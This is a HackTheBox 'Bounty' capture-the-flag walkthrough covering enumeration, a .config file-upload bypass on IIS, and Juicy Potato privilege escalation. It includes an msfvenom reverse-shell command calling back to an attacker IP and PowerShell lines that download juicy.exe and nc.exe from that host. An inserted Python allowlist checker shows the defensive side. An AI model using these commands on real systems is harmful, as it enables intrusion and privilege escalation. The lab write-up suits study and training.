HackTheBox - Bounty

Nmap scan results (Basic and all port)

Even the all-port scan found only a single open port: port 80.
Web server running: Microsoft IIS httpd 7.5
Gobuster scan with aspx as file extension
gobuster dir -u http://bounty.htb/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -o gobuster-scan.out -x aspx



There is file upload functionality at /transfer.aspx.
I tried uploading various file extensions, but we can also use Burp Suite's Intruder tab to find the valid file extension.
Running ASP Code using .config as the extension
Valid File Extension that can be uploaded: .config

The uploaded file runs ASP code; after the upload, the machine should ping us back.
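
A defensive counterpart to the upload finding above, as an added example that is not part of the original write-up: an allowlist check that rejects a .config upload and tags rejected files that carry ASP or IIS configuration markers. The names `check_upload`, `ALLOWED_EXTENSIONS` and `CONTENT_RULES` are hypothetical, the image-only allowlist is an assumption about what the form is for, and the sample uploads are constructed.

```python
import re
from pathlib import PureWindowsPath

# Assumption: the upload form is only meant to accept images.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}

# Markers used to tag rejected uploads for alerting. They are not run on
# accepted images, because random binary data can match them by chance.
CONTENT_RULES = [
    ("asp-code-block", re.compile(rb"<%.*?%>", re.S)),
    ("iis-handlers-section", re.compile(rb"<\s*handlers\b", re.I)),
    ("iis-request-filtering", re.compile(rb"<\s*requestFiltering\b", re.I)),
]


def check_upload(filename, data):
    """Return rejection reasons for an upload; an empty list means accept."""
    # Drop any client-supplied path, then the trailing dots and spaces that
    # Windows ignores when it creates the file.
    name = PureWindowsPath(filename).name.rstrip(". ").lower()
    ext = PureWindowsPath(name).suffix
    reasons = []
    if name == "web.config":
        reasons.append("name:web.config")
    if ext not in ALLOWED_EXTENSIONS:
        reasons.append("extension-not-allowed:" + (ext or "<none>"))
    if reasons:
        reasons += ["content:" + label
                    for label, rule in CONTENT_RULES if rule.search(data)]
    return reasons


# Constructed sample uploads (not taken from the target).
SAMPLES = {
    "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "web.config": (b'<?xml version="1.0"?>\n<configuration><system.webServer>'
                   b"<handlers></handlers></system.webServer></configuration>\n"
                   b'<% Response.Write("constructed sample") %>\n'),
}

if __name__ == "__main__":
    for fname, body in SAMPLES.items():
        print(fname, "->", check_upload(fname, body) or "accepted")
```

An allowlist is used instead of a blocklist of script extensions because a blocklist is what lets .config through in the first place.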


Creating reverse shell script using msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe > shell.exe



Running the script by editing web.config file

Also, don't forget to set up the multi handler in msfconsole.


Exploiting Juicy Potato Attack
SeImpersonatePrivilege is enabled, which means we can try the Juicy Potato attack, eventually giving us SYSTEM privileges.
whoami /priv

References: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
You can download the JuicyPotato script from here.
powershell "(New-Object Net.WebClient).DownloadFile('http://10.10.14.5:8000/juicy.exe','juicy.exe')"
powershell "(New-Object Net.WebClient).DownloadFile('http://10.10.14.5:8000/nc.exe','nc.exe')"

